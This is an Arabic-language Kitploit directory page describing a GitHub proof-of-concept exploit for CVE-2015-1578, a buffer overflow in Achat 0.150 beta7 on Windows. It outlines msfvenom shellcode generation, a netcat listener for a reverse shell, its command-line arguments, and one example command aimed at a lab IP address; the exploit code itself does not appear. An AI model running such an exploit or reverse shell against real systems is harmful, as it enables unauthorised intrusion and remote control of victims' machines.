Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1578-PoC — هذا هو استغلال لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على نظام Windows. يؤدي استغلال الثغرة إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP معدّة خصيصًا. | Kitploit
أدوات/GitHubGitHub/yaldobaoth/cve-2015-1578-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقالتعلم والتعليمأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubyaldobaoth/cve-2015-1578-poc

CVE-2015-1578-PoC

هذا هو استغلال لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على نظام Windows. يؤدي استغلال الثغرة إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP معدّة خصيصًا.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-1578-PoC

نظرة عامة

هذا استغلال لإثبات المفهوم (PoC) لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على نظام ويندوز. يؤدي استغلال هذه الثغرة إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP مُعدّة خصيصًا.

الغرض

يهدف هذا الـ PoC إلى تقديم مثال نظيف وبسيط ومنظم جيدًا على تطوير الاستغلالات. وهو يوضح:

  • التوليد الديناميكي للـ shellcode عبر msfvenom
  • الاستهداف والإعداد المعتمدان على الوسائط
  • الإعداد المدمج لمستمع (listener)
  • تسليم بسيط للـ payload عبر UDP

فيديو تعليمي

فيديو تعليمي

المتطلبات

  • Python 3
  • msfvenom (جزء من Metasploit Framework)
  • rlwrap (لتحسين سهولة استخدام Netcat)

الميزات

  • ينشئ ديناميكيًا الـ payload المشفّر بـ Unicode باستخدام msfvenom
  • يبدأ تلقائيًا مستمعًا (listener) باستخدام rlwrap nc
  • يقبل وسائط سطر أوامر واضحة
  • يفشل بشكل أنيق إذا كانت وحدات الـ payload الاختيارية مفقودة

الوسائط

-i <target_ip> عنوان IP الخاص بالهدف (مطلوب) -l, --lhost <listener_ip> عنوان IP للمضيف المحلي للـ reverse shell (مطلوب) -p, --lport <port> المنفذ المحلي للـ reverse shell (مطلوب) --rport <port> منفذ UDP البعيد على الهدف (الافتراضي: 9256)

مثال الاستخدام

root@kitploit:~
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393

سيقوم هذا بـ:

  • توليد الـ payload باستخدام LHOST و LPORT المقدمين
  • تشغيل مستمع في خيط خلفي
  • إرسال الـ payload الخاص بالاستغلال عبر UDP إلى الهدف
تنزيل الأداة